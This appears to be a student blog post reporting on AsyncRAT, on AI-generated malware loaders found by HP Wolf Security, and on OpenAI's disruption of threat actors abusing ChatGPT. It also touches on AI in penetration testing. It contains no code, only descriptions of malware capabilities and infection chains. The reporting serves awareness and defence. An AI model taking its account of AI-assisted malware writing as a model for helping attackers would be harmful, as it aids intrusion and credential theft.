Released in 2019, AsyncRAT is a Remote Access Trojan(RAT), designed as a open source remote administration tool by its creators as per their official GitHub page[2]. AsyncRAT is almost exclusively used by cybercriminals to as a medium to load malware, remote code execution, steal credentials, keystroke logging, stealth screen recording etc. [2]The product has botnet capabilities with a command center as C2 server located remotely from where it can be managed to control affected devices.<\/p>\n\n\n\n
This is has become a very powerful tool for cybercriminals in materializing their intents. Since its release it has only become popular and widely used and leveraged by threat actors in attacks against multitude of entities such as airports, hospitals, government offices etc.<\/p>\n\n\n\n
Findings of HP Wolf Security<\/strong> <\/p>\n\n\n\n Researchers at HP Wolf Security[5] intercepted the campaign emails sent out in early June, it had a malware in the form of an encrypted zip attachment. Upon brute forcing the file they were able to discover VBScript and JavaScript codes written by AI. The script commenting, style of writing, and the choice of using native language for function names and variable allowed the researchers to conclude its AI generated.<\/p>\n\n\n\n Image 1: The VBScript Code<\/p>\n\n\n\n The file then downloads and executes AsyncRAT which set up encrypted remote connection to the controller downloads the malware which allows the remote controller to log keystrokes[1]. Though AsyncRAT can deliver many other payloads remotely once setup.<\/p>\n\n\n\n Image 2: Complete Infection Chain<\/p>\n\n\n\n Open AI findings<\/strong> [4]<\/p>\n\n\n\n After the HP Wolf Security findings and a April 2024 findings reported by Proof point on a PowerShell loader suspected of written by AI to deliver TA547(aka \u201cScully Spider\u201d), it was apparent that that there has been significant rise in cybercriminals use of generative AI.. Hence OpenAI recently released they have \u201cdisrupted over 20 malicious cyber operations trying to abuse ChatGPT\u201d. The data released in the report is only for 2024. They have highlighted abuse of ChatGPT by threat actors in Iran and China using the power of it to enhance their operating capabilities.<\/p>\n\n\n\n Role of AI in cybercrime<\/strong><\/p>\n\n\n\n More and more non-technical malicious actors are finding it easier to use AI generated codes to design malwares and perform attacks. AI is being used lowering the bar for threat space and the capability to implement a large-scale attack with limited knowledge.[1] Its apparent that more and more threat actors are in the business lured by quick massive money with limited knowledge and understanding of the capabilities. AI is empowering such entities and groups to thrive and achieve some success.<\/p>\n\n\n\n Researchers are now wondering the effect it may have on the highly specialized cybercriminals who would be able to create dangerous applications, more sophisticated attacks using AI tools. We are only seeing drops of the massive storm that are about to landfall as AI matures. With the pace AI has evolved in the last few years it\u2019s a matter time till we see multifold increase in cybercriminal activity.<\/p>\n\n\n\n Artificial Intelligence application in threat prevention<\/strong><\/p>\n\n\n\n I understand this is a massive topic and wide scope, as the power of AI has only been nurtured in surface, we are still unaware of the true potential. Its interesting to see this technology evolve rapidly as more and more business adapt to it. Its mind boggling to see the rise of AI in such short period of time and unearth its limitless potential. As we are witnessing to some extent how this can disrupt if abused by bad actors, organizations are also harnessing its potential to protect, secure their perimeter.<\/p>\n\n\n\n AI integration in penetration testing has been evolving rapidly. [3]Penetration testing can be tedious and time consuming and it takes significant human resources and knowledge to perform Pen testing. Hopefully this allows organizations to be better prepared against adversaries and impending attacks.<\/p>\n\n\n\n As more and more cybersecurity tools are powered by AI, efficient threat modeling can be achieved. Cybersecurity professionals will be empowered to detect and mitigate risks faster. At the bottom of it, its important to keep our security tools updated and never download attachments from unknown sources and be diligent in doublechecking attachments from known sources, because it could be a matter of one wrong click. <\/p>\n\n\n\n References:<\/strong><\/p>\n\n\n\n 1.Author: BILL TOULAS LINK: https:\/\/www.bleepingcomputer.com\/news\/security\/hackers-deploy-ai-written-malware-in-targeted-attacks\/?&web_view=true Image1, Link: https:\/\/www.bleepstatic.com\/images\/news\/u\/1220909\/2024\/AI\/04\/comments.jpg “OpenAI says it has disrupted 20-plus foreign influence networks in past year”[4] It was about time when analysts and researchers will find AI-generated malware in the wild. Last month, a report published by HP wolf Security[5] highlighted the malicious code has been detected in the recent targeted email campaigns to French users to deliver AsyncRAT … <\/p>\n![\"\"](\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/comments.jpg\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/wpsites.ucalgary.ca\/jacobson-cpsc\/wp-content\/uploads\/sites\/119\/2024\/10\/diagram-1024x487.jpg\")
<\/figure>\n\n\n\n
2.AUTHOR: N\/A LINK:https:\/\/www.blackberry.com\/us\/en\/solutions\/endpoint-security\/ransomware-protection\/asyncrat#how-to-prevent
3.Author: Jason Firch https:\/\/purplesec.us\/learn\/ai-penetration-testing\/
4.Author : Bill Toulas https:\/\/www.bleepingcomputer.com\/news\/security\/openai-confirms-threat-actors-use-chatgpt-to-write-malware\/
5. Author: HP Wolf Security Report, Link: https:\/\/www.hp.com\/us-en\/newsroom\/press-releases\/2024\/ai-generate-malware.html<\/a><\/p>\n\n\n\n
Image2, Link: https:\/\/www.bleepstatic.com\/images\/news\/u\/1220909\/2024\/AI\/04\/diagram.jpg<\/p>\n","protected":false},"excerpt":{"rendered":"